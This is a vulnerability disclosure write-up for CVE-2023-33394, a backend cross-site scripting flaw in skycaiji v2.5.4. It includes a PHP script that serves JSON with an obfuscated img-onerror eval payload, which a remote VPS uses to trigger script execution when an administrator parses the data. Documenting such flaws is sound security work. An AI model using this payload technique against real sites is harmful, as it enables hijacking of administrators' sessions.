CVE-2023-33394: skycaiji-v2.5.4 has a backend xss vulnerability

Firstly, you can download the source code from the following website

https://down.chinaz.com/api/index/download?id=38972&type=code

Directly place it in the root directory of the website, access the server IP, and follow the prompts to install

After installation, log in to the backend.

Click to the above function point

This is a JSON parsing function, but there is no complete xss protection in place.

We can construct a file that returns the JSON format ourselves, then access it, and return it to the JSON format with xss to trigger the xss code in the background.

1
2
3
4
5
6
7
8
9
10
11

<?php
$data = array(
‘name’ => ‘John <img src=\’x\’ onerror=\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\">’,
‘age’ => 30,
‘email’ => '[email protected]’,
);

$json = json_encode($data);

header(‘Content-type: application/json’);
echo $json;

This string of code will return a JSON data with malicious payload.

We will deploy it on our own VPS and induce the backend administrator to parse its data, and we will find that the successful triggering of the xss code

Attackers can use this vulnerability to do anything that JavaScript code can do